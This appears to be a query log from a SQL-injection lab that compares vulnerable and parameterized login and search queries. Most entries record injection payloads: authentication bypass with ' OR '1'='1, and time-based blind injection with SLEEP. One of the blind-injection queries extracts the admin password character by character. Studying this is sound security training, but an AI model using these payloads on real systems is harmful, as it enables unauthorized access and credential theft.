[2025-11-10 05:00:32] LOGIN_VULN | QUERY: SELECT * FROM users WHERE username = 'siddhant' AND password = '' OR '1'='1' LIMIT 1 | PARAMS: []
[2025-11-10 05:00:43] LOGIN_FIX | QUERY: SELECT * FROM users WHERE username = ? AND password = ? LIMIT 1 | PARAMS: ["siddhant","' OR '1'='1"]
[2025-11-11 18:57:40] LOGIN_VULN | QUERY: SELECT * FROM users WHERE username = 'vbcyeu' AND password = '34t34f' LIMIT 1 | PARAMS: []
[2025-11-11 18:57:43] LOGIN_VULN | QUERY: SELECT * FROM users WHERE username = 'vbcyeu' AND password = '34t34f' LIMIT 1 | PARAMS: []
[2025-11-11 18:59:31] LOGIN_VULN_BUILTIN | QUERY: builtin-login | PARAMS: ["demo"]
[2025-11-11 18:59:44] LOGIN_VULN | QUERY: SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1' LIMIT 1 | PARAMS: []
[2025-11-11 19:05:59] LOGIN_FIX_BUILTIN | QUERY: builtin-login | PARAMS: ["demo"]
[2025-11-11 19:06:12] LOGIN_FIX_BUILTIN | QUERY: builtin-login | PARAMS: ["demo"]
[2025-11-11 19:06:19] LOGIN_FIX | QUERY: SELECT * FROM users WHERE username = ? AND password = ? | PARAMS: ["siddhant","' OR '1'='1"]
[2025-11-11 19:30:53] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' LIMIT 1 | PARAMS: []
[2025-11-11 19:30:53] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' LIMIT 1 | PARAMS: []
[2025-11-11 19:30:54] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' LIMIT 1 | PARAMS: []
[2025-11-11 19:30:54] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' LIMIT 1 | PARAMS: []
[2025-11-11 19:30:54] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:17] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' OR IF(1=1, SLEEP(3), 0) -- ' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:18] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' OR IF(1=1, SLEEP(3), 0) -- ' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:36] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' OR IF(1=1, SLEEP(3), 0) -- ' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:44] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' OR IF(1=1, SLEEP(3), 0) -' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:56] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '%' OR 1=1 --' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:59] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '%' OR 1=1 --' LIMIT 1 | PARAMS: []
[2025-11-11 19:31:59] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '%' OR 1=1 --' LIMIT 1 | PARAMS: []
[2025-11-11 19:33:44] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' OR IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a', SLEEP(3), 0) --' LIMIT 1 | PARAMS: []
[2025-11-11 19:34:09] SEARCH_VULN_TIME | QUERY: SELECT id FROM products WHERE name = '' LIMIT 1 | PARAMS: []
